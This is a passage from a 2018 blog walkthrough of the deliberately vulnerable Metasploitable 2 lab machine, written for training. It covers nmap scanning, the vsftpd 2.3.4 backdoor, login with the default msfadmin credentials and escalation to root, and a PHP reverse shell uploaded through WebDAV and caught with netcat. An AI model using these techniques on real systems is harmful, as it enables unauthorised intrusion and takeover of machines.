tag:blogger.com,1999:blog-9185259772061866192024-03-05T18:25:30.793-05:00The Professional Hacker DigestProfessional development and highly technical security posts. Austinhttp://www.blogger.com/profile/01968094133955654942noreply@blogger.comBlogger22125tag:blogger.com,1999:blog-918525977206186619.post-66482610409843794252018-03-11T16:41:00.001-04:002018-03-11T16:41:04.277-04:00Metasploitable 2 - My WalkthroughIt has been SO LONG since I posted something and I want to thank everyone who has been checking in and who continued to visit my blog while I was not posting. I have a good explanation for why I disappeared for so long, but that will be a separate blog post.<br />
<br />
Regular disclaimer: This blog post is my own thoughts and words and does not represent the views of any past, present, or future employers. I also do not take any responsibility for any of the information used within this blog post or any other post on this blog for any reason. Hack responsibly. Hack Professionally.<br />
<br />
For this blog post, we will be walking through Metasploitable 2. While there are many reviews of this wonderful training box, I wanted to contribute my own walkthrough. So without further ado, let's jump in.<br />
<br />
I'm going to skip over setting up the virtual machine, if you would like me to show you how I did it I can create a blog post addendum; let me know in the comments.<br />
<br />
Once Metasploitable 2 is up and running and you have the IP address (mine will be 10.0.0.22 for this walkthrough), then you want to start your scan.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMAk03abznkJNw1nGFTNsTdeX1YfMESsD1MjU9rkdJCh5uQogZycF2LHnwAVXLeTlnj7wt2Ub5w_UBHP6HjrWJLv0IKikJ_myRjvrVytFXF03QMExhXawsitEw_Q_qAn4nro5v3giBOcZM/s1600/1_nmap_basic_all_command.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMAk03abznkJNw1nGFTNsTdeX1YfMESsD1MjU9rkdJCh5uQogZycF2LHnwAVXLeTlnj7wt2Ub5w_UBHP6HjrWJLv0IKikJ_myRjvrVytFXF03QMExhXawsitEw_Q_qAn4nro5v3giBOcZM/s320/1_nmap_basic_all_command.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhistBjqfKmExJhml4e6yW_WrJq3XBG-g8_Frz8HQYh0tXknYlSWNOhliS7jp0mi4Pyqof6PaUy9YqJtjqUUvJ2UpqbR2iMXhkY_qgazq4e-qtxpHiUr8L8fMKyKsHL-ywokLFE1dSCFa2-/s1600/2_nmap_basic_all_command_output.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhistBjqfKmExJhml4e6yW_WrJq3XBG-g8_Frz8HQYh0tXknYlSWNOhliS7jp0mi4Pyqof6PaUy9YqJtjqUUvJ2UpqbR2iMXhkY_qgazq4e-qtxpHiUr8L8fMKyKsHL-ywokLFE1dSCFa2-/s320/2_nmap_basic_all_command_output.png" width="320" /></a></div>
<br />
The nmap command uses a few flags to conduct the initial scan. The -Pn flag prevents host discovery pings and just assumes the host is up. In this case, I know the host is up because i'm hosting it locally. The -sS flag is for a SYN scan. The SYN scan is less reliable because it does not complete the three-way handshake while trying to connect to the ports, however that also means it CAN BE more stealthy. Some IDS/IPS/Firewall systems won't log the SYN packets that hit the system and are more likely to log actual connections made with remote systems once the three-way handshake is complete. This is not to say it's not POSSIBLE to log a SYN scan, but it will be less likely based on the amount of information that may need to be stored. The next flag, -T5, tells nmap to scan REALLY fast. I believe it says "insane" in the man page documentation. Yup, it does, I checked. The next flag, -p-, says to scan all ports. This flag can also be written as -p1-65535. The last flag, -oA, tells nmap to output all formats and name them "nmap_basic_all" with the proper extension. Lastly, as I mentioned before, we are scanning 10.0.0.22 for this walkthrough. When you scan your own Metasploitable 2 image, it is very likely the IP Address will be different.<br />
<br />
We can also see the results below. These are all the ports nmap found that were open according to the SYN scan. We can use these results to scan fewer ports with a more intense scan. So we do some linux-fu to get a list of port numbers to scan. You can see my linux-fu below. Fair warning, you may see me lose port 21. I remember it later and have included an additional image with details about it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKlctTM6rQ2duhdr76ag11GJ_tGx1s0kHuftC4F9hc62XXx6-YJlovk7R3uvvil31zmgqDiEcb3wjCCnkQ4-QpA0ip884FRnA4nQ7vmQPr4de_Aqjcxt9YjkA2qXleMHiNHZUgupa0L8gp/s1600/3_linux_fu_get_list_of_ports.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKlctTM6rQ2duhdr76ag11GJ_tGx1s0kHuftC4F9hc62XXx6-YJlovk7R3uvvil31zmgqDiEcb3wjCCnkQ4-QpA0ip884FRnA4nQ7vmQPr4de_Aqjcxt9YjkA2qXleMHiNHZUgupa0L8gp/s320/3_linux_fu_get_list_of_ports.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
So here is my linux-fu, I am 'cat'ing the greppable nmap file into sed, which will remove all commas and replace them with newlines. I then cat that into cut in order to grab the port numbers, that is then piped into another sed command that removes spaces for formatting, which is then piped into a grep that returns all results that don't contain the word "Nmap" or "Host" (this is where I lose port 21), and then I want to recombine the newline separated list back into a comma separated list to pass to nmap which is easier done with perl than sed (I don't know why...the sed answers looked significantly more complicated) and lastly I remove the trailing comma and pipe it to a file called ports.txt. I'm sure there is a much better way to do this (and not lose port 21). Please comment below if you have a better script or set of commands!</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTGzEKNpQsiylkN57fWmQhRe5w2fasw-D9U0M8f7Yc1XgB41Clm44FdtnTaYUGW87VA9UaQxqwWmPGJ7p7T_zDP5OX7U3KXjs6c2hQB5ck9hfE60xWst-fr66YPI7XboNCRoodG0yVn3C-/s1600/4_nmap_specific_port_scan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTGzEKNpQsiylkN57fWmQhRe5w2fasw-D9U0M8f7Yc1XgB41Clm44FdtnTaYUGW87VA9UaQxqwWmPGJ7p7T_zDP5OX7U3KXjs6c2hQB5ck9hfE60xWst-fr66YPI7XboNCRoodG0yVn3C-/s320/4_nmap_specific_port_scan.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2PVHdExzQQPvPp38OM93py3KiuhyphenhypheniNfyghj9qso4rW9V3bUUN6OugOs-ohcZhwhEvHw8l-RQ31Kbsoi5kxIkJP8MyKo2JxRpazpGa13q-H989qaglCZlhKR5L0UHqjeyN9EIFt2t_xlLk/s1600/5_nmap_specific_port_scan_output_pt1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2PVHdExzQQPvPp38OM93py3KiuhyphenhypheniNfyghj9qso4rW9V3bUUN6OugOs-ohcZhwhEvHw8l-RQ31Kbsoi5kxIkJP8MyKo2JxRpazpGa13q-H989qaglCZlhKR5L0UHqjeyN9EIFt2t_xlLk/s320/5_nmap_specific_port_scan_output_pt1.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg26cjjeqZWDz58z11PoLxOmG_lzGxvRNqcJbWVcwbTeYMB1Od-uPu1t9IJ3sFCH_KSpl6PK9rxxJ9W9ToyAVYPNWDqi7Gc_8q4GEyjiKLduxCzoaFCfjeeGpvmj1U5njMB7Cr1yqtOVvKv/s1600/6_nmap_specific_port_scan_output_pt2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg26cjjeqZWDz58z11PoLxOmG_lzGxvRNqcJbWVcwbTeYMB1Od-uPu1t9IJ3sFCH_KSpl6PK9rxxJ9W9ToyAVYPNWDqi7Gc_8q4GEyjiKLduxCzoaFCfjeeGpvmj1U5njMB7Cr1yqtOVvKv/s320/6_nmap_specific_port_scan_output_pt2.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheVPFjUGX3u28MdmdAAQxcxzRMHeUwkKEgUX10m4DeuB11ioFnej9mbsK8U3SbqlzCOR1DDfzYJffyP43qAbDwYEmvagzcpEY7A1HigRyM8UD_-jJn6mO5ZTipLSlJj8P7DqG1sAEHnIfr/s1600/7_nmap_specific_port_scan_output_pt3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheVPFjUGX3u28MdmdAAQxcxzRMHeUwkKEgUX10m4DeuB11ioFnej9mbsK8U3SbqlzCOR1DDfzYJffyP43qAbDwYEmvagzcpEY7A1HigRyM8UD_-jJn6mO5ZTipLSlJj8P7DqG1sAEHnIfr/s320/7_nmap_specific_port_scan_output_pt3.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCyDfphQqcsgggckcovcE_jWW1KFbw_UJjh6YHgJ5ih4gP6_7pLePvpfG2eXTOVcm7zgak7r9sf_8rXybN6fdaknna6PpYhfkVew2WzSL0kwv5PZZ8BXKEacTen-TvTwgs0qpYHCCmLXV3/s1600/8_nmap_lost_ftp_port.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCyDfphQqcsgggckcovcE_jWW1KFbw_UJjh6YHgJ5ih4gP6_7pLePvpfG2eXTOVcm7zgak7r9sf_8rXybN6fdaknna6PpYhfkVew2WzSL0kwv5PZZ8BXKEacTen-TvTwgs0qpYHCCmLXV3/s320/8_nmap_lost_ftp_port.png" width="320" /></a></div>
<br />
Now you've seen all the results from the service and default-script scans. The -sV was the flag for version scanning and the -sC is the flag for default-script scanning. the $(cat ports.txt) is a bash utility that allows you to run a command inside a command and insert the output directly in the outer command. So running $(cat ports.txt) actually runs cat on the file and the output of the command, which is the comma separated list of ports, is returned and passed along with the -p flag to nmap.<br />
<br />
Now that we have finished our first round of scanning, let's begin walking through exploits for this box.<br />
<br />
The first exploit is on port 21, vsftpd 2.3.4. This is one of my favorite because it's so easy to exploit. This version sometimes has the vulnerability because someone committed code to the vsftpd repository that contained a backdoor when a smiley face ( :) ) is used in the username. This opens up a backdoor on port 6200. So first let's look at the Metasploit exploit.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoDW7y7b_wOCw3y0jNAn0XtsrzkP1pGKOqAHJdhF4su2YbcZjmBzFFachATuNUAa0P5EJlDfSleFxnnTcCFdkVfL-jk2XrddMWztZoiy_bfn62g0jUO9bh6wwVGj7yMQf6DBtp6n4dnETW/s1600/10_vsftpd_234_metasploit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoDW7y7b_wOCw3y0jNAn0XtsrzkP1pGKOqAHJdhF4su2YbcZjmBzFFachATuNUAa0P5EJlDfSleFxnnTcCFdkVfL-jk2XrddMWztZoiy_bfn62g0jUO9bh6wwVGj7yMQf6DBtp6n4dnETW/s320/10_vsftpd_234_metasploit.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGi1p_duG08HF01AgBKHj7Uik29_QhhhGnzibksuHHyZB82DGMBXtRCVSbKFSVGr3q14rT4c4eZLCGVklXblBOlodxco67_LY1S9IHy1KEFq5cdsONaP8-sTN-RtaQqEJjJU1046Jhlm59/s1600/11_vsftpd_exploit_show_options.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGi1p_duG08HF01AgBKHj7Uik29_QhhhGnzibksuHHyZB82DGMBXtRCVSbKFSVGr3q14rT4c4eZLCGVklXblBOlodxco67_LY1S9IHy1KEFq5cdsONaP8-sTN-RtaQqEJjJU1046Jhlm59/s320/11_vsftpd_exploit_show_options.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRjjzMCHZk6EAEKGjtVJs61gc458w3ZqRKhNpwFqfNec9A4B1ig-VEMTGSxM-gn6p8F5Ets6VVKFY3z_IjQfrp1N0rmZ5t7qzyEDnlMZW0ZXR0XoKacBjmMee-KFBHwKcr5myxubZfMYc5/s1600/12_vsftpd_exploit_worked_metasploit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRjjzMCHZk6EAEKGjtVJs61gc458w3ZqRKhNpwFqfNec9A4B1ig-VEMTGSxM-gn6p8F5Ets6VVKFY3z_IjQfrp1N0rmZ5t7qzyEDnlMZW0ZXR0XoKacBjmMee-KFBHwKcr5myxubZfMYc5/s320/12_vsftpd_exploit_worked_metasploit.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
With this shell, we don't see the prompt we are so used to having because all the environment variables that usually come with a "proper" shell are not included in this instance of the shell. We can get those back and have it operate like a proper shell and I'll show you that with our netcat version of the exploit.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1orDrm17cI_6sYpB7JermSd9bHmSFDFWEAhQ6E_P9k-Ezo8xUWNLBAtwr3NY-vHyS9hY7xnNnvNMCX0cIPnd3o9q0leDYk5Z6lj5-csYBPavrA1THcvZP-ng2PIJsrRAzR1otqfZF_9bG/s1600/13_nc_vsftpd_exploit_worked.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1orDrm17cI_6sYpB7JermSd9bHmSFDFWEAhQ6E_P9k-Ezo8xUWNLBAtwr3NY-vHyS9hY7xnNnvNMCX0cIPnd3o9q0leDYk5Z6lj5-csYBPavrA1THcvZP-ng2PIJsrRAzR1otqfZF_9bG/s320/13_nc_vsftpd_exploit_worked.png" width="320" /></a></div>
<br />
Here we can see us connecting to the FTP server (port 21) with netcat (nc) and we type in USER as the FTP command and any username containing the smiley which triggers the back door. It also does not matter what we use for the password as you can see by the password I typed. After that, we want to connect to the opened backdoor on port 6200 and we have root access to the machine. A complete compromise.<br />
<br />
I almost forgot, here is the "normal" shell that we get by calling pty.spawn in python.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilQYrr_sRmEWekaMgTVaRGeD1a8LwLkFail54X2cA3h-3Kg8CMMMah3RfiwyhwxEfG2yBZaKnYTCr1sRtV8_W6EvLZGelKcuFyFTPWMRNZT2-Ik4sy4NJSQlP_iT8Dc0_YlwV1KCU79i2p/s1600/14_nc_normal_bash_prompt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilQYrr_sRmEWekaMgTVaRGeD1a8LwLkFail54X2cA3h-3Kg8CMMMah3RfiwyhwxEfG2yBZaKnYTCr1sRtV8_W6EvLZGelKcuFyFTPWMRNZT2-Ik4sy4NJSQlP_iT8Dc0_YlwV1KCU79i2p/s320/14_nc_normal_bash_prompt.png" width="320" /></a></div>
<br />
<br />
We're going to skim over port 22 right now because SSH itself is not vulnerable, but we can use other vulnerabilities later on to set up ssh access for ourselves. One example is finding credentials, like msfadmin:msfadmin from telnet or the website. We can use those to log in via ssh or telnet This is very unlikely, however if you did find credentials and wanted to use them then you would log in to the remote target using ssh, ssh msfadmin@10.0.0.22, and put in the password, msfadmin, and you would get a shell like this:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkrlrGYjomVUGJt21yyj3i2gh0in2GL7P2ZomVumGvbmYt5Aq4oTwiCuH6Vu-vIfcYV2MaIS-BXlIdHG5fKPTOHMbSTE8WPRPUavFWZkvQ38HCffjpkNmque-b0z8l_vMdpba-7kqtqrIt/s1600/16_ssh_msfadmin_login.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkrlrGYjomVUGJt21yyj3i2gh0in2GL7P2ZomVumGvbmYt5Aq4oTwiCuH6Vu-vIfcYV2MaIS-BXlIdHG5fKPTOHMbSTE8WPRPUavFWZkvQ38HCffjpkNmque-b0z8l_vMdpba-7kqtqrIt/s320/16_ssh_msfadmin_login.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
After you're logged on, one of the most simple ways to elevate privileges is to check if you already have them. We know msfadmin's password so by typing 'sudo -l' we are going to list the sudo permissions for this user. We see that it has all permissions and we can run 'sudo su root' to change our user to root. Boom!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyl-3VfO-BlRQvGqYWaI9MUGrxBBu-azv8bh1C1RW6j-8sW3pVAd56vm_7VQNq_KHkv8FN-_drR7WiiWl-WtKREO28n_8BpqMAHEfi8b2cWd0VhNelxgk8p0lVBA61kcb0htim3OgbH-qM/s1600/17_msfadmin_has_sudo_permissions.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyl-3VfO-BlRQvGqYWaI9MUGrxBBu-azv8bh1C1RW6j-8sW3pVAd56vm_7VQNq_KHkv8FN-_drR7WiiWl-WtKREO28n_8BpqMAHEfi8b2cWd0VhNelxgk8p0lVBA61kcb0htim3OgbH-qM/s320/17_msfadmin_has_sudo_permissions.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
Telnet (port 23) is also open and the same series of steps would work with telnet. It is rare for telnet to be open nowadays, but it is still seen on old boxes and routers more often than it should. It largely stopped being used because it sent all traffic in the clear across the network. So anyone who was snooping could see your username and password, in the clear, and know exactly which machine you were logging into. This would effectively give everyone your level of access to any machine you can access remotely.<br />
<br />
Next we are going to look at the website on port 80. Again, this site shows us credentials to log into the machine. Let's first look at the WebDAV section of the site. According to <a href="https://en.wikipedia.org/wiki/WebDAV" target="_blank">wikipedia</a> WebDAV is an extension of HTTP that allows users to author pages while using HTTP. For example, commands like PUT and DELETE are able to be used to put and delete files off of the server. THIS IS REALLY BAD. Let me walk you through why...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFoHYs8EgSmY77KYfTKMzHR6h59w-VUaUG16TBJsBDmIMk_Vp8Y0QQpSWeHi-j48OGcUBoOy7vCEtsQH9bN3kPo9cOv8nGnmwMM2hTk4Fa5wzquQhOu0k7GIIQmsEH1Vj_j87aHhgzPoXh/s1600/15_webpage.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFoHYs8EgSmY77KYfTKMzHR6h59w-VUaUG16TBJsBDmIMk_Vp8Y0QQpSWeHi-j48OGcUBoOy7vCEtsQH9bN3kPo9cOv8nGnmwMM2hTk4Fa5wzquQhOu0k7GIIQmsEH1Vj_j87aHhgzPoXh/s320/15_webpage.png" width="320" /></a></div>
<br />
Here is the main page for the website. We're going to be looking at WebDAV so let's head on over to that page.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9gM2KBj_lmG_g1ulQqJKPMOyiO60Ix_I8ixUuY2S3cf0w79hgNns7aW18MS1O6HXW-8g6JAgTCKIkqRHBJaMBoEc6fuNA8ebnJDCUavnrbGaV2Ofo0mrTh-_6u0UlfohhVEYMAo7GGJxo/s1600/19_web_dav_homepage.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9gM2KBj_lmG_g1ulQqJKPMOyiO60Ix_I8ixUuY2S3cf0w79hgNns7aW18MS1O6HXW-8g6JAgTCKIkqRHBJaMBoEc6fuNA8ebnJDCUavnrbGaV2Ofo0mrTh-_6u0UlfohhVEYMAo7GGJxo/s320/19_web_dav_homepage.png" width="320" /></a></div>
<br />
We can see it's an empty directory, which is no big deal, but since WebDAV allows us to put and delete files, let's see if we can introduce our own malicious code to the website. Hint: we can.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJZdm8Moq-GJPaREeSeupG2HmLNaVfDsLBGYiJW-Ivr7m-XJdmc8K1eEqeTcqRDnp6LxTGM7G66cNPPjzuOhjmGwGy8jnCxStdfzhKQnMtyPLRExVGnfq9BL6akb0hYgk1gOlTZkkQ27Hw/s1600/18_404_test_txt_missing.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJZdm8Moq-GJPaREeSeupG2HmLNaVfDsLBGYiJW-Ivr7m-XJdmc8K1eEqeTcqRDnp6LxTGM7G66cNPPjzuOhjmGwGy8jnCxStdfzhKQnMtyPLRExVGnfq9BL6akb0hYgk1gOlTZkkQ27Hw/s320/18_404_test_txt_missing.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgktw-QwtST1vgsNuZg9hXH3L72nkAvoKzny42LgPVLQ4bQ7zVAMVsomurKud7h9q6Z_yajg6AJnvOoieV4_gRyVzqwDcpgE_lWfCENWlwb6DDL3G-huSvMcDBjksFAxUCZBAZKvS_iwXFn/s1600/20_put_test_txt_webdav.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgktw-QwtST1vgsNuZg9hXH3L72nkAvoKzny42LgPVLQ4bQ7zVAMVsomurKud7h9q6Z_yajg6AJnvOoieV4_gRyVzqwDcpgE_lWfCENWlwb6DDL3G-huSvMcDBjksFAxUCZBAZKvS_iwXFn/s320/20_put_test_txt_webdav.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiM-oM6Ftkc0a5of7hkcKvEPEvS9kLswIUjqXa7dt1Pmwkdvwt__74MIpk3wdDYXAic77K6cEsV8flAhsLoOzSqXEXpl4CbubVa4QJaZvoYnYeVDlpsqcika3ONgmaa3DNr6pSvfC4Zi8ei/s1600/21_hello_world_webdav.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiM-oM6Ftkc0a5of7hkcKvEPEvS9kLswIUjqXa7dt1Pmwkdvwt__74MIpk3wdDYXAic77K6cEsV8flAhsLoOzSqXEXpl4CbubVa4QJaZvoYnYeVDlpsqcika3ONgmaa3DNr6pSvfC4Zi8ei/s320/21_hello_world_webdav.png" width="320" /></a></div>
<br />
As you can see we've introduced benign text into the site, but if we can insert ANY text into the site we can get a remote shell. We can do this using a PHP webshell. First, let's grab our php-reverse-shell from Kali and edit it so it calls us back.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-EeP7RMEInOfu9mdVohxLNJqji-tbd7Pd14p8ri9UDGlVlqgTRShon7XWQPRi4lukiTzCT6vLHe81BlLMqRkqBpGGRlOY37uyZj5qGhHK16Lg-8wO8hcNXaIhyphenhyphenKO5CQ3KAuptDQSwOIRc/s1600/22_php_reverse_webshell_vim.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-EeP7RMEInOfu9mdVohxLNJqji-tbd7Pd14p8ri9UDGlVlqgTRShon7XWQPRi4lukiTzCT6vLHe81BlLMqRkqBpGGRlOY37uyZj5qGhHK16Lg-8wO8hcNXaIhyphenhyphenKO5CQ3KAuptDQSwOIRc/s320/22_php_reverse_webshell_vim.png" width="320" /></a></div>
<br />
Now that we put in the correct IP address, the reverse shell will call us back. We need a listener on port 1234 to catch the callback though. This can be done with netcat.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiu6JPpE6NKZa2xiAGv250eoaU91B_osKTX7vSRAniq-V1ytSYVNojqwt5bkQmwghXon6Ipa2h59blyd0oap22FARBTFgQyZDX4hwU1n63SeZDSxIwtQbf1hwMTOGGBlqjni7lSoCiCVie_/s1600/24_using_nc_listen_callback.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiu6JPpE6NKZa2xiAGv250eoaU91B_osKTX7vSRAniq-V1ytSYVNojqwt5bkQmwghXon6Ipa2h59blyd0oap22FARBTFgQyZDX4hwU1n63SeZDSxIwtQbf1hwMTOGGBlqjni7lSoCiCVie_/s320/24_using_nc_listen_callback.png" width="320" /></a></div>
<br />
Once we have a listener, it's time to upload (with cadaver) and execute the shell...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgarUZFe6vBj-QfQHryH-lxAZpSz-jsS2vSDWgWEjbhdE4gf_LBFM5gtUtquJxFdCySiEaBsxKH-eWgb5odLbFTi0nUh935AzxuMAj_TN9yEBBv7sCAatKv6hmLh0Uu9rU5ppUoXCCXfH_d/s1600/23_upload_php_reverse_shell_cadaver.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgarUZFe6vBj-QfQHryH-lxAZpSz-jsS2vSDWgWEjbhdE4gf_LBFM5gtUtquJxFdCySiEaBsxKH-eWgb5odLbFTi0nUh935AzxuMAj_TN9yEBBv7sCAatKv6hmLh0Uu9rU5ppUoXCCXfH_d/s320/23_upload_php_reverse_shell_cadaver.png" width="320" /></a></div>
<br />
...and here is us catching the callback! We trigger the callback by visiting the malicious script in our browser. Since we uploaded myshell.php, we would have to visit http://10.0.0.22/dav/myshell.php to trigger the callback like this.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyqrKFQvYHza8GUnRfPym7h27_TN8u7wjSmTfa_4CQURXz0IC7iqJYvZSIxJdfkgRqqkqcwJlvPNdKzJhpFmKIAkc8X8ELY2T2Dqb0MGnGepYyOsh-SjEUsTIGOqqxoNMMOo_akuqRnCRE/s1600/25_we_got_php_reverse_shell_callback.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyqrKFQvYHza8GUnRfPym7h27_TN8u7wjSmTfa_4CQURXz0IC7iqJYvZSIxJdfkgRqqkqcwJlvPNdKzJhpFmKIAkc8X8ELY2T2Dqb0MGnGepYyOsh-SjEUsTIGOqqxoNMMOo_akuqRnCRE/s320/25_we_got_php_reverse_shell_callback.png" width="320" /></a></div>
<br />
We have a slightly more normal shell this time, but we can use the same trick, plus the credentials we know, to escalate all the way from www-data user to root.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
